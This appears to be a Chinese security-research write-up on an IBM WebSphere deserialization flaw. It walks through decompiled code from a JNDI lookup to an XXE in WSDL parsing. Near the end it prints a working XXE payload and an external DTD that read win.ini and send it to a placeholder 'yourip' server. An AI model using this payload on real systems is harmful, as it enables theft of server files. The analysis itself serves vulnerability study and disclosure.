作者:Longofo@知道创宇404实验室 & r00t4dm@奇安信A-TEAM
时间:2020年9月22日
前言
补丁
漏洞分析
com.ibm.ws.ejb.portable.EJBMetaDataImpl#readObject中:private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException {try {in.defaultReadObject();......this.ivStatelessSession = in.readBoolean();ClassLoader loader = (ClassLoader)AccessController.doPrivileged(new PrivilegedAction() {public Object run() {return Thread.currentThread().getContextClassLoader();}});this.ivBeanClassName = in.readUTF();this.ivHomeClass = loader.loadClass(in.readUTF());this.ivRemoteClass = loader.loadClass(in.readUTF());if (!this.ivSession) {this.ivPKClass = loader.loadClass(in.readUTF());}this.ivHomeHandle = (HomeHandle)in.readObject();EJBHome ejbHomeStub = this.ivHomeHandle.getEJBHome();//ivHomeHandle是一个接口,我们找到了HomeHandleImpl,里面进行了JNDI查询,并且url可控this.ivEjbHome = (EJBHome)PortableRemoteObject.narrow(ejbHomeStub, this.ivHomeClass);//如果跟踪过CVE-2020-4450就能感觉到,这里十分类似CVE-2020-4450,不过缺少了后续的调用,无法像CVE-2020-4450利用WSIF的方式触发后续的RCE,WSIF之前那个XXE也被修复了} catch (IOException var6) {throw var6;} catch (ClassNotFoundException var7) {throw var7;}}
com.ibm.ws.ejb.portable.HomeHandleImpl#getEJBHome如下:public EJBHome getEJBHome() throws RemoteException {if (this.ivEjbHome == null) {NoSuchObjectException re;......InitialContext ctx;try {if (this.ivInitialContextProperties == null) {ctx = new InitialContext();} else {try {ctx = new InitialContext(this.ivInitialContextProperties);} catch (NamingException var5) {ctx = new InitialContext();}}this.ivEjbHome = (EJBHome)PortableRemoteObject.narrow(ctx.lookup(this.ivJndiName), homeClass);//进行了JNDI查询,ivJndiName是属性,很容易控制} catch (NoInitialContextException var6) {Properties p = new Properties();p.put("java.naming.factory.initial", "com.ibm.websphere.naming.WsnInitialContextFactory");ctx = new InitialContext(p);this.ivEjbHome = (EJBHome)PortableRemoteObject.narrow(ctx.lookup(this.ivJndiName), homeClass);}......return this.ivEjbHome;}
com.ibm.ws.webservices.engine.client.ServiceFactory#getObjectInstance中,找到了那个XXE:public Object getObjectInstance(Object refObject, Name name, Context nameCtx, Hashtable environment) throws Exception {Object instance = null;if (refObject instanceof Reference) {Reference ref = (Reference)refObject;RefAddr addr = ref.get("service classname");Object obj = null;if (addr != null && (obj = addr.getContent()) instanceof String) {instance = ClassUtils.forName((String)obj).newInstance();} else {addr = ref.get("WSDL location");if (addr != null && (obj = addr.getContent()) instanceof String) {URL wsdlLocation = new URL((String)obj);addr = ref.get("service namespace");if (addr != null && (obj = addr.getContent()) instanceof String) {String namespace = (String)obj;addr = ref.get("service local part");if (addr != null && (obj = addr.getContent()) instanceof String) {String localPart = (String)obj;QName serviceName = QNameTable.createQName(namespace, localPart);Class[] formalArgs = new Class[]{URL.class, QName.class};Object[] actualArgs = new Object[]{wsdlLocation, serviceName};Constructor ctor = Service.class.getDeclaredConstructor(formalArgs);instance = ctor.newInstance(actualArgs);//调用了Service构造函数}}}}addr = ref.get("maintain session");if (addr != null && instance instanceof Service) {((Service)instance).setMaintainSession(true);}}return instance;}
com.ibm.ws.webservices.engine.client.Service#Service(java.net.URL, javax.xml.namespace.QName),在构造函数中:public Service(URL wsdlLocation, QName serviceName) throws ServiceException {if (log.isDebugEnabled()) {log.debug("Entry Service(URL, QName) " + serviceName.toString());}this.serviceName = serviceName;this.wsdlLocation = wsdlLocation;Definition def = cachingWSDL ? (Definition)cachedWSDL.get(wsdlLocation.toString()) : null;if (def == null) {Document doc = null;try {doc = XMLUtils.newDocument(wsdlLocation.toString());//wsdlLocation外部可控,这里XMLUtils.newDocument进去就请求了wsdlLocation获取xml文件并解析} catch (Exception var8) {FFDCFilter.processException(var8, "com.ibm.ws.webservices.engine.client.Service.initService", "199", this);throw new ServiceException(Messages.getMessage("wsdlError00", "", "\n" + var8));}try {WSDLFactory factory = new WSDLFactoryImpl();WSDLReader reader = factory.newWSDLReader();reader.setFeature("javax.wsdl.verbose", false);def = reader.readWSDL(wsdlLocation.toString(), doc);//一开始我们只停留在了上面那个XMLUtils.newDocument,利用那儿的异常带不出去数据,由于是高版本sdk,外带也只能带一行数据。后来看到reader.readWSDL进去还能利用另一种方式外带全部数据if (cachingWSDL) {cachedWSDL.put(wsdlLocation.toString(), def);}} catch (Exception var7) {FFDCFilter.processException(var7, "com.ibm.ws.webservices.engine.client.Service.initService", "293", this);throw new ServiceException(Messages.getMessage("wsdlError00", "", "\n" + var7));}}this.initService(def);if (log.isDebugEnabled()) {log.debug("Exit Service(URL, QName) ");}}
com.ibm.wsdl.xml.WSDLReaderImpl#readWSDL(java.lang.String, org.w3c.dom.Document)之后,会调用到一个com.ibm.wsdl.xml.WSDLReaderImpl#parseDefinitions:protected Definition parseDefinitions(String documentBaseURI, Element defEl, Map importedDefs) throws WSDLException {checkElementName(defEl, Constants.Q_ELEM_DEFINITIONS);WSDLFactory factory = this.getWSDLFactory();Definition def = factory.newDefinition();if (this.extReg != null) {def.setExtensionRegistry(this.extReg);}String name = DOMUtils.getAttribute(defEl, "name");String targetNamespace = DOMUtils.getAttribute(defEl, "targetNamespace");NamedNodeMap attrs = defEl.getAttributes();if (importedDefs == null) {importedDefs = new Hashtable();}if (documentBaseURI != null) {def.setDocumentBaseURI(documentBaseURI);((Map)importedDefs).put(documentBaseURI, def);}if (name != null) {def.setQName(new QName(targetNamespace, name));}if (targetNamespace != null) {def.setTargetNamespace(targetNamespace);}int size = attrs.getLength();for(int i = 0; i < size; ++i) {Attr attr = (Attr)attrs.item(i);String namespaceURI = attr.getNamespaceURI();String localPart = attr.getLocalName();String value = attr.getValue();if (namespaceURI != null && namespaceURI.equals("http://www.w3.org/2000/xmlns/")) {if (localPart != null && !localPart.equals("xmlns")) {def.addNamespace(localPart, value);} else {def.addNamespace((String)null, value);}}}for(Element tempEl = DOMUtils.getFirstChildElement(defEl); tempEl != null; tempEl = DOMUtils.getNextSiblingElement(tempEl)) {if (QNameUtils.matches(Constants.Q_ELEM_IMPORT, tempEl)) {def.addImport(this.parseImport(tempEl, def, (Map)importedDefs));} else if (QNameUtils.matches(Constants.Q_ELEM_DOCUMENTATION, tempEl)) {def.setDocumentationElement(tempEl);} else if (QNameUtils.matches(Constants.Q_ELEM_TYPES, tempEl)) {def.setTypes(this.parseTypes(tempEl, def));} else if (QNameUtils.matches(Constants.Q_ELEM_MESSAGE, tempEl)) {def.addMessage(this.parseMessage(tempEl, def));} else if (QNameUtils.matches(Constants.Q_ELEM_PORT_TYPE, tempEl)) {def.addPortType(this.parsePortType(tempEl, def));} else if (QNameUtils.matches(Constants.Q_ELEM_BINDING, tempEl)) {def.addBinding(this.parseBinding(tempEl, def));} else if (QNameUtils.matches(Constants.Q_ELEM_SERVICE, tempEl)) {def.addService(this.parseService(tempEl, def));} else {def.addExtensibilityElement(this.parseExtensibilityElement(Definition.class, tempEl, def));}}this.parseExtensibilityAttributes(defEl, Definition.class, def, def);return def;}
com.ibm.wsdl.xml.WSDLReaderImpl#parseImport:protected Import parseImport(Element importEl, Definition def, Map importedDefs) throws WSDLException {Import importDef = def.createImport();String locationURI;try {String namespaceURI = DOMUtils.getAttribute(importEl, "namespace");locationURI = DOMUtils.getAttribute(importEl, "location");//获取location属性String contextURI = null;if (namespaceURI != null) {importDef.setNamespaceURI(namespaceURI);}if (locationURI != null) {importDef.setLocationURI(locationURI);if (this.importDocuments) {try {contextURI = def.getDocumentBaseURI();Definition importedDef = null;InputStream inputStream = null;InputSource inputSource = null;URL url = null;if (this.loc != null) {inputSource = this.loc.getImportInputSource(contextURI, locationURI);String liu = this.loc.getLatestImportURI();importedDef = (Definition)importedDefs.get(liu);if (inputSource.getSystemId() == null) {inputSource.setSystemId(liu);}} else {URL contextURL = contextURI != null ? StringUtils.getURL((URL)null, contextURI) : null;url = StringUtils.getURL(contextURL, locationURI);importedDef = (Definition)importedDefs.get(url.toString());if (importedDef == null) {inputStream = StringUtils.getContentAsInputStream(url);//进行了请求,可以通过这个请求将数据外带,但是还是有些限制,例如有&或"等字符的文件会报错导致带不了......
xml如下:<!DOCTYPE x [<!ENTITY % aaa SYSTEM "file:///C:/Windows/win.ini"><!ENTITY % bbb SYSTEM "http://yourip:8000/xx.dtd">%bbb;]><definitions name="HelloService" xmlns="http://schemas.xmlsoap.org/wsdl/">&ddd;</definitions>xx.dtd如下:<!ENTITY % ccc '<!ENTITY ddd '<import namespace="uri" location="http://yourip:8000/xxeLog?%aaa;"/>'>'>%ccc;
最后
References
[1] 漏洞公告:
往 期 热 门
(点击图片跳转)
觉得不错点个“在看”哦
文章来源: https://wiki.ioin.in/url/oor2
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh